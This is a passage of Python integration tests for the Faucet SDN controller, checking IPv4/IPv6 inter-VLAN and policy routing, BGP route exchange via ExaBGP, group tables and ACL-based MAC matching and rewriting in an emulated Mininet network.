first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.add_host_ipv6_address(first_host, ipaddress.ip_interface('fc00::1:1/64'))
# We use a narrower mask to force second_host to use the /128 route,
# since otherwise it would realize :99 is directly connected via ND and send direct.
self.add_host_ipv6_address(second_host, ipaddress.ip_interface('fc00::1:2/126'))
self.add_host_ipv6_address(first_host, first_host_alias_ip)
self.add_host_route(second_host, first_host_alias_host_ip, faucet_vip_ip.ip)
self.one_ipv6_ping(second_host, first_host_alias_ip.ip)
self.assertGreater(
self.scrape_prometheus_var(
'vlan_neighbors', {'ipv': '6', 'vlan': '100'}),
1)
class FaucetUntaggedIPv4GlobalInterVLANRouteTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24"]
200:
faucet_vips: ["10.200.0.254/24"]
faucet_mac: "%s"
""" % FAUCET_MAC2 + """
routers:
global:
vlans: [100, 200]
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1", "::1"]
neighbor_addresses: ["127.0.0.1", "::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
global_vlan: 300
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 200
"""
exabgp_peer_conf = """
static {
route 10.99.99.0/24 next-hop 10.200.0.1 local-preference 100;
route 10.0.5.0/24 next-hop 127.0.0.1;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(first_host, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(second_host, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.99.0/24'), vlan_vid=300)
self.verify_invalid_bgp_route(r'.+10.0.5.0\/24.+because nexthop not in VLAN.+')
class FaucetUntaggedIPv4InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24", "169.254.1.1/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24", "169.254.2.1/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
for vlanb_vid in (300, 200):
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(first_host, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(second_host, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
self.change_vlan_config(
'vlanb', 'vid', vlanb_vid, restart=True, cold_start=True)
class FaucetUntaggedPortSwapIPv4InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
vlana:
vid: 100
faucet_vips: ["10.100.0.254/24", "169.254.1.1/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24", "169.254.2.1/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [vlana, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: vlana
%(port_2)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_connectivity(host_a, host_b):
host_a.setIP(str(first_host_ip.ip), prefixLen=24)
host_b.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(host_a, second_host_ip, first_faucet_vip.ip)
self.add_host_route(host_b, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(host_a, second_host_ip.ip)
self.one_ipv4_ping(host_b, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(host_a, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(host_b, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
test_connectivity(first_host, second_host)
# Delete port 1, add port 3
self.change_port_config(
self.port_map['port_1'], None, None,
restart=False, cold_start=False)
self.add_port_config(
self.port_map['port_3'], {'native_vlan': 'vlana'},
restart=True, cold_start=True)
test_connectivity(third_host, second_host)
class FaucetUntaggedExpireIPv4InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
max_host_fib_retry_count: 2
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
second_host.cmd('ifconfig %s down' % second_host.defaultIntf().name)
expired_re = r'.+expiring dead route %s.+' % second_host_ip.ip
self.wait_until_matching_lines_from_faucet_log_files(expired_re)
second_host.cmd('ifconfig %s up' % second_host.defaultIntf().name)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
class FaucetUntaggedIPv6InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["fc00::1:254/112", "fe80::1:254/112"]
vlanb:
vid: 200
faucet_vips: ["fc01::1:254/112", "fe80::2:254/112"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v6: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('fc00::1:1/64')
second_host_net = ipaddress.ip_interface('fc01::1:1/64')
self.add_host_ipv6_address(first_host, first_host_net)
self.add_host_ipv6_address(second_host, second_host_net)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV6.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV6_2.ip)
self.one_ipv6_ping(first_host, second_host_net.ip)
self.one_ipv6_ping(second_host, first_host_net.ip)
class FaucetUntaggedIPv4PolicyRouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "100"
faucet_vips: ["10.0.0.254/24"]
acl_in: pbr
200:
description: "200"
faucet_vips: ["10.20.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.20.0.2"
300:
description: "300"
faucet_vips: ["10.30.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.30.0.3"
acls:
pbr:
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.2"
actions:
allow: 1
output:
swap_vid: 300
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.0/24"
actions:
allow: 1
output:
swap_vid: 200
- rule:
actions:
allow: 1
routers:
router-100-200:
vlans: [100, 200]
router-100-300:
vlans: [100, 300]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# 10.99.0.1 is on b2, and 10.99.0.2 is on b3
# we want to route 10.99.0.0/24 to b2, but we want
# want to PBR 10.99.0.2/32 to b3.
first_host_ip = ipaddress.ip_interface('10.0.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.0.0.254/24')
second_host_ip = ipaddress.ip_interface('10.20.0.2/24')
second_faucet_vip = ipaddress.ip_interface('10.20.0.254/24')
third_host_ip = ipaddress.ip_interface('10.30.0.3/24')
third_faucet_vip = ipaddress.ip_interface('10.30.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
remote_ip = ipaddress.ip_interface('10.99.0.1/24')
remote_ip2 = ipaddress.ip_interface('10.99.0.2/24')
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
third_host.setIP(str(third_host_ip.ip), prefixLen=24)
self.host_ipv4_alias(second_host, remote_ip)
self.host_ipv4_alias(third_host, remote_ip2)
self.add_host_route(first_host, remote_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.add_host_route(third_host, first_host_ip, third_faucet_vip.ip)
# ensure all nexthops resolved.
self.one_ipv4_ping(first_host, first_faucet_vip.ip)
self.one_ipv4_ping(second_host, second_faucet_vip.ip)
self.one_ipv4_ping(third_host, third_faucet_vip.ip)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=200)
self.wait_for_route_as_flow(
third_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=300)
# verify b1 can reach 10.99.0.1 and .2 on b2 and b3 respectively.
self.one_ipv4_ping(first_host, remote_ip.ip)
self.one_ipv4_ping(first_host, remote_ip2.ip)
class FaucetUntaggedIPv4PolicyRouteOrdereredTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "100"
faucet_vips: ["10.0.0.254/24"]
acl_in: pbr
200:
description: "200"
faucet_vips: ["10.20.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.20.0.2"
300:
description: "300"
faucet_vips: ["10.30.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.30.0.3"
acls:
pbr:
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.2"
actions:
allow: 1
output:
- swap_vid: 300
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.0/24"
actions:
allow: 1
output:
- swap_vid: 200
- rule:
actions:
allow: 1
routers:
router-100-200:
vlans: [100, 200]
router-100-300:
vlans: [100, 300]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# 10.99.0.1 is on b2, and 10.99.0.2 is on b3
# we want to route 10.99.0.0/24 to b2, but we want
# want to PBR 10.99.0.2/32 to b3.
first_host_ip = ipaddress.ip_interface('10.0.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.0.0.254/24')
second_host_ip = ipaddress.ip_interface('10.20.0.2/24')
second_faucet_vip = ipaddress.ip_interface('10.20.0.254/24')
third_host_ip = ipaddress.ip_interface('10.30.0.3/24')
third_faucet_vip = ipaddress.ip_interface('10.30.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
remote_ip = ipaddress.ip_interface('10.99.0.1/24')
remote_ip2 = ipaddress.ip_interface('10.99.0.2/24')
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
third_host.setIP(str(third_host_ip.ip), prefixLen=24)
self.host_ipv4_alias(second_host, remote_ip)
self.host_ipv4_alias(third_host, remote_ip2)
self.add_host_route(first_host, remote_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.add_host_route(third_host, first_host_ip, third_faucet_vip.ip)
# ensure all nexthops resolved.
self.one_ipv4_ping(first_host, first_faucet_vip.ip)
self.one_ipv4_ping(second_host, second_faucet_vip.ip)
self.one_ipv4_ping(third_host, third_faucet_vip.ip)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=200)
self.wait_for_route_as_flow(
third_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=300)
# verify b1 can reach 10.99.0.1 and .2 on b2 and b3 respectively.
self.one_ipv4_ping(first_host, remote_ip.ip)
self.one_ipv4_ping(first_host, remote_ip2.ip)
class FaucetUntaggedMixedIPv4RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["172.16.0.254/24", "10.0.0.254/24"]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('10.0.0.1/24')
second_host_net = ipaddress.ip_interface('172.16.0.1/24')
second_host.setIP(str(second_host_net.ip), prefixLen=24)
self.one_ipv4_ping(first_host, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, self.FAUCET_VIPV4_2.ip)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV4.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV4_2.ip)
self.one_ipv4_ping(first_host, second_host_net.ip)
self.one_ipv4_ping(second_host, first_host_net.ip)
class FaucetUntaggedMixedIPv6RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112", "fc01::1:254/112"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('fc00::1:1/64')
second_host_net = ipaddress.ip_interface('fc01::1:1/64')
self.add_host_ipv6_address(first_host, first_host_net)
self.one_ipv6_ping(first_host, self.FAUCET_VIPV6.ip)
self.add_host_ipv6_address(second_host, second_host_net)
self.one_ipv6_ping(second_host, self.FAUCET_VIPV6_2.ip)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV6.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV6_2.ip)
self.one_ipv6_ping(first_host, second_host_net.ip)
self.one_ipv6_ping(second_host, first_host_net.ip)
class FaucetUntaggedBGPIPv6DefaultRouteTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route ::/0 next-hop fc00::1:1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1', self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
first_host_alias_ip = ipaddress.ip_interface('fc00::50:1/112')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.add_host_ipv6_address(first_host, first_host_alias_ip)
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV6.ip)
self.one_ipv6_ping(second_host, first_host_alias_ip.ip)
self.one_ipv6_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv6RouteTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route fc00::10:0/112 next-hop fc00::1:1 local-preference 100;
route fc00::20:0/112 next-hop fc00::1:2 local-preference 100;
route fc00::30:0/112 next-hop fc00::1:2 local-preference 100;
route fc00::40:0/112 next-hop fc00::1:254;
route fc00::50:0/112 next-hop fc00::2:2;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1', self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.verify_invalid_bgp_route(r'.+fc00::40:0\/112.+cannot be us$')
self.verify_ipv6_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv6_routing_mesh()
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
self.verify_traveling_dhcp_mac()
class FaucetUntaggedSameVlanIPv6RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::10:1/112", "fc00::20:1/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::10:2"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::20:2"
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_interface('fc00::10:2/112')
first_host_ctrl_ip = ipaddress.ip_address('fc00::10:1')
second_host_ip = ipaddress.ip_interface('fc00::20:2/112')
second_host_ctrl_ip = ipaddress.ip_address('fc00::20:1')
self.add_host_ipv6_address(first_host, first_host_ip)
self.add_host_ipv6_address(second_host, second_host_ip)
self.add_host_route(
first_host, second_host_ip, first_host_ctrl_ip)
self.add_host_route(
second_host, first_host_ip, second_host_ctrl_ip)
self.wait_for_route_as_flow(
first_host.MAC(), first_host_ip.network)
self.wait_for_route_as_flow(
second_host.MAC(), second_host_ip.network)
self.one_ipv6_ping(first_host, second_host_ip.ip)
self.one_ipv6_ping(first_host, second_host_ctrl_ip)
self.one_ipv6_ping(second_host, first_host_ip.ip)
self.one_ipv6_ping(second_host, first_host_ctrl_ip)
class FaucetUntaggedIPv6RouteTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::1:1"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::1:2"
- route:
ip_dst: "fc00::30:0/112"
ip_gw: "fc00::1:2"
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1')
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
self.verify_ipv6_routing_mesh()
second_host = self.hosts_name_ordered()[1]
self.flap_all_switch_ports()
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv6Network('fc00::30:0/112'))
self.verify_ipv6_routing_mesh()
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}, default=0),
0)
updates = self.exabgp_updates(self.exabgp_log)
for route_string in (
'fc00::1:0/112 next-hop fc00::1:254',
'fc00::10:0/112 next-hop fc00::1:1',
'fc00::20:0/112 next-hop fc00::1:2',
'fc00::30:0/112 next-hop fc00::1:2'):
self.assertTrue(re.search(route_string, updates), msg=updates)
class FaucetUntaggedRestBcastIPv6RouteTest(FaucetUntaggedIPv6RouteTest):
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_2)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_3)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_4)d:
native_vlan: 100
restricted_bcast_arpnd: true
"""
class FaucetTaggedIPv6RouteTest(FaucetTaggedTest):
"""Test basic IPv6 routing without BGP."""
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::1:1"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::1:2"
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
"""Test IPv6 routing works."""
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_ip = ipaddress.ip_interface('fc00::1:1/112')
second_host_ip = ipaddress.ip_interface('fc00::1:2/112')
first_host_routed_ip = ipaddress.ip_interface('fc00::10:1/112')
second_host_routed_ip = ipaddress.ip_interface('fc00::20:1/112')
for _coldstart in range(2):
for _swaps in range(5):
self.verify_ipv6_routing_pair(
first_host, first_host_ip, first_host_routed_ip,
second_host, second_host_ip, second_host_routed_ip)
self.swap_host_macs(first_host, second_host)
self.coldstart_conf()
class FaucetGroupTableTest(FaucetUntaggedTest):
CONFIG = """
group_table: True
""" + CONFIG_BOILER_UNTAGGED
def test_group_exist(self):
self.assertEqual(
100,
self.get_group_id_for_matching_flow(
{'dl_vlan': '100', 'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE))
class FaucetTaggedGroupTableTest(FaucetTaggedTest):
CONFIG = """
group_table: True
""" + CONFIG_TAGGED_BOILER
def test_group_exist(self):
self.assertEqual(
100,
self.get_group_id_for_matching_flow(
{'dl_vlan': '100', 'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE))
class FaucetEthSrcMaskTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_src: 0e:0d:00:00:00:00/ff:ff:00:00:00:00
actions:
allow: 1
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:0d:00:00:00:99')
self.retry_net_ping(hosts=(first_host, second_host))
self.wait_nonzero_packet_count_flow(
{'dl_src': '0e:0d:00:00:00:00/ff:ff:00:00:00:00'},
table_id=self._PORT_ACL_TABLE)
class FaucetDestRewriteTest(FaucetUntaggedTest):
def override_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:02'
OVERRIDE_MAC = override_mac()
def rewrite_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:03'
REWRITE_MAC = rewrite_mac()
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "%s"
actions:
allow: 1
output:
set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (override_mac(), rewrite_mac())
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten mac address.
tcpdump_filter = ('icmp and ether dst %s' % self.REWRITE_MAC)
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), self.OVERRIDE_MAC)),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
timeout=5, packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
def verify_dest_rewrite(self, source_host, overridden_host, rewrite_host, tcpdump_host):
overridden_host.setMAC(self.OVERRIDE_MAC)
rewrite_host.setMAC(self.REWRITE_MAC)
rewrite_host.cmd('arp -s %s %s' % (overridden_host.IP(), overridden_host.MAC()))
rewrite_host.cmd(' '.join((self.FPINGS_ARGS_ONE, overridden_host.IP())))
self.wait_until_matching_flow(
{'dl_dst': self.REWRITE_MAC},
table_id=self._ETH_DST_TABLE,
actions=['OUTPUT:%u' % self.port_map['port_3']])
tcpdump_filter = ('icmp and ether src %s and ether dst %s' % (
source_host.MAC(), rewrite_host.MAC()))
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: source_host.cmd(
'arp -s %s %s' % (rewrite_host.IP(), overridden_host.MAC())),
# this will fail if no reply
lambda: self.one_ipv4_ping(
source_host, rewrite_host.IP(), require_host_learned=False)],
timeout=3, packets=1)
# ping from h1 to h2.mac should appear in third host, and not second host, as
# the acl should rewrite the dst mac.
self.assertFalse(re.search(
'%s: ICMP echo request' % rewrite_host.IP(), tcpdump_txt))
def test_switching(self):
"""Tests that a acl can rewrite the destination mac address,
and the packet will only go out the port of the new mac.
(Continues through faucet pipeline)
"""
source_host, overridden_host, rewrite_host = self.hosts_name_ordered()[0:3]
self.verify_dest_rewrite(
source_host, overridden_host, rewrite_host, overridden_host)
class FaucetDestRewriteOrderedTest(FaucetUntaggedTest):
def override_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:02'
